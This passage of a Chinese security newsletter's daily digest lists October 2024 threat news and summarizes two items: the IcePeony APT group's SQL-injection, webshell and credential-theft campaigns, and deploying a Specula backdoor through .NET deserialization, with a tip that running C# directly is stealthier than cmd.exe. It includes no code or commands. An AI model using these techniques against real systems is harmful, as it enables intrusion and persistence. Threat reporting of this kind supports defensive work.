			5. 因渲染和外链原因，公众号<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">甲方安全建设</code>发送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">日报</code>或日期,如<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">20241025</code>获取<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">图文评论版pdf</code>
		</p>
	</blockquote><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">目录</span></h3><blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span><p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">0x01 【2024-1018】中国背景APT团伙“IcePeony”利用‘996’工作文化进行网络攻击<br/>0x02 【2024-1018】利用.NET反序列化漏洞部署Specula后门<br/>0x03 【2024-1018】CVE-2024-30090：Windows本地提权漏洞PoC公布<br/>0x04 【2024-1020】使用LLMs进行零样本漏洞发现的工具<br/>0x05 【2024-1020】COM对象激活的陷阱与解决方案<br/>0x06 【2024-1020】Grafana中的CVE-2024-9264漏洞允许执行任意DuckDB SQL查询<br/>0x07 【2024-1021】SAP NetWeaver AS Java 代码注入漏洞修复<br/>0x08 【2024-1021】活动目录渗透测试全面指南<br/>0x09 【2024-1021】近期最珍贵的Android用户空间漏洞CVE-2024-31317分析<br/>0x0a 【2024-1022】Servicelens：枚举和分析Microsoft 365域名服务<br/>0x0b 【2024-1022】使用CSS泄露HTML文本节点的挑战<br/>0x0c 【2024-1022】远程Chrome滥用概念验证工具remotechrome<br/>0x0d 【2024-1023】微软远程注册表客户端中的权限提升漏洞<br/>0x0e 【2024-1023】黑客基础：Linux 日志系统<br/>0x0f 【2024-1024】在URL凭证中隐藏有效载荷<br/>0x10 【2024-1024】Kubernetes权限提升攻击分析（第一部分）<br/>0x11 【2024-1024】国家间谍利用FortiManager漏洞进行网络攻击<br/>0x12 【2024-1025】将有效载荷嵌入PNG文件的GitHub项目<br/>0x13 【2024-1025】Spip内容管理系统0-day漏洞研究<br/>0x14 【2024-1025】Lazarus APT组织的加密游戏：投资者与零日漏洞的对决<br/>0x15 【2024-1025】开放目录中发现Rekoobe后门，或针对TradingView用户<br/></p></blockquote>
	<h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x01
			 中国背景APT团伙“IcePeony”利用‘996’工作文化进行网络攻击</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">研究人员发现了一起名为“IcePeony”的中国背景高级持续性威胁（APT）团伙，该团伙自2023年起活跃，采用SQL注入等手段攻击包括印度、毛里求斯和越南等国家的政府机构、学术机构和政治组织，目的是窃取凭证信息。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.562962962962963" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=81cef08b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EAVibRrqqsLJU5qZJp2UibaYWAoLPcR2Zbgk6oEm5ia6lwDCyVQKIFafHdg%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.4546296296296296" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=e035ab88&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EAMrkocpFNfm7z6weOa3jHlBR0zsicKwSv3MpGs9nXbeicj81XsIdOuib8w%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.9136939010356732" data-w="869" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=629421f1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EAnpg6IHbU7FIUumv2NqBGGvKcUTou9OdHibjicqibkZKia7qB1uzbXoBF1A%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">揭秘未知APT组织：冰凌花</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">IcePeony 揭露 &#39;996&#39; 工作文化</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EA8Dm52IOIMTwoAFxzHLQBHkSbuablsDukrj4x6PQ56oFsc6fdZkd4WA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EA8Dm52IOIMTwoAFxzHLQBHkSbuablsDukrj4x6PQ56oFsc6fdZkd4WA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1525442812145452"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">IcePeony是一起具有中国背景的APT团伙，自2023年起针对亚洲国家的政府和教育机构进行攻击。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">他们的攻击手段通常包括SQL注入、部署Webshell和后门以及窃取凭证信息。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者使用了多种开源工具，并且定制了一些自己的工具，如StaX、ProxyChains、IceCache和IceEvent。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">IceCache是针对IIS服务器的定制恶意软件，基于开源项目reGeorge，增加了文件传输和命令执行功能。</section></li></ul>
	<br/>
	<p>🏷️: IcePeony, APT, 网络攻击, 中国背景, 996工作文化</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x02
			 利用.NET反序列化漏洞部署Specula后门</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本文介绍了如何利用.NET反序列化漏洞，通过Specula工具在工作站上部署后门。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAy8O8mrPlQLTyyECiaica0pd40aic3JRzsHZHQnknqKGBY8YF03CG5oBKg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAy8O8mrPlQLTyyECiaica0pd40aic3JRzsHZHQnknqKGBY8YF03CG5oBKg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4848554124112428"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">.NET反序列化是一种可以被利用用于红队行动的技术。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Specula工具可以用来在工作站上部署后门，通过设置特定的注册表项来实现。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">利用.NET反序列化时，直接执行C#代码比通过cmd.exe执行命令更为隐蔽和有效。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">对于ysoserial这样的工具，理解其内部工作机制对于有效利用和进一步的工具改进至关重要。</section></li></ul>
	<br/>
